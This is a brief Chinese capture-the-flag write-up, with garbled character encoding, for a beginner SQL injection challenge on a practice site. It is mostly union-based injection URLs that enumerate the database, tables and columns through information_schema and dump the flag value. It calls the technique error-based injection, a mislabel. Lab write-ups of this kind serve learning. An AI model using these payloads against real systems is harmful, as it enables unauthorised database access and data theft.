這個(gè)看起來有點(diǎn)簡單
原題鏈接
http://ctf5.shiyanbar.com/8/index.php?id=1
分析
id(int)型,標(biāo)準(zhǔn)新手sql注入題
報(bào)錯(cuò)注入注服,無過濾
order by 發(fā)現(xiàn)兩列
http://ctf5.shiyanbar.com/8/index.php?id=1%20union%20select%201,database()%20--+
數(shù)據(jù)庫:
my_db
http://ctf5.shiyanbar.com/8/index.php?id=0 union select 1,table_name from information_schema.tables where table_schema=database() --+
表
ID content
1 news
1 thiskey
http://ctf5.shiyanbar.com/8/index.php?id=0 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='thiskey'--+
列
ID content
1 k0y
http://ctf5.shiyanbar.com/8/index.php?id=0 union select 1,k0y from thiskey --+
dump
ID content
1 whatiMyD91dump
flag
whatiMyD91dump
知識(shí)點(diǎn)
報(bào)錯(cuò)注入